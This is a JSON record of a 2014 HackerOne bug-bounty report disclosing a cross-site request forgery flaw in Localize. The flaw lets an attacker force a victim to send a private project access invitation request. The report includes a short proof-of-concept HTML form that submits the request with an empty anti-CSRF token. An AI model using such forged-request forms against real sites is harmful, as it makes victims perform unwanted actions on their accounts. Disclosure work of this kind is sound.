{"id": "H1:8226", "type": "hackerone", "bulletinFamily": "bugbounty", "title": "Localize: Private Project Access Request Invitation Sent Via CSRF ", "description": "Hi Team,\r\n\r\nI have found a CSRF vulnerability using which the attacker can do or force the victim to sent Private Project Access Invitation Request Via CSRF the anti-csrf token is not getting validated on the server-side. \r\n\r\n\r\nPrivate Project Access Request Invitation Sent Via CSRF Code:\r\n\r\n<html>\r\n <body>\r\n <form action=\"http://www.localize.io/\" method=\"POST\">\r\n <input type=\"hidden\" name=\"CSRFToken\" value=\"\" />\r\n <input type=\"hidden\" name=\"requestInvitation[repositoryID]\" value=\"9p\" />\r\n <input type=\"submit\" value=\"Submit form\" />\r\n </form>\r\n </body>\r\n</html>\r\n", "published": "2014-04-20T18:02:43", "modified": "2014-04-21T02:49:03", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://hackerone.com/reports/8226", "reporter": "ajaysinghnegi", "references": [], "cvelist": [], "lastseen": "2018-04-19T17:34:10", "viewCount": 1, "enchantments": {"score": {"value": 3.5, "vector": "NONE", "modified": "2018-04-19T17:34:10", "rev": 2}, "dependencies": {"references": [], "modified": "2018-04-19T17:34:10", "rev": 2}, "vulnersScore": 3.5}, "bounty": 0.0, "bountyState": "resolved", "h1team": {"profile_picture_urls": {"medium": "https://profile-photos.hackerone-user-content.com/000/000/152/377fed61fc81ae7be46b421b7c21b287fc14f80e_medium.png?1397692219", "small": "https://profile-photos.hackerone-user-content.com/000/000/152/ea4486c84479fe42c54fdbfdba183ba9d66469ca_small.png?1397692219"}, "handle": "localize", "url": "https://hackerone.com/localize"}, "h1reporter": {"hacker_mediation": false, "disabled": false, "username": "ajaysinghnegi", "is_me?": false, "profile_picture_urls": {"small": "https://profile-photos.hackerone-user-content.com/000/001/233/6f682fb8268a94725a7bf7c8aede8ee70cd3e2ee_small.jpg?1396289298"}, "hackerone_triager": false, "url": "/ajaysinghnegi"}}

{}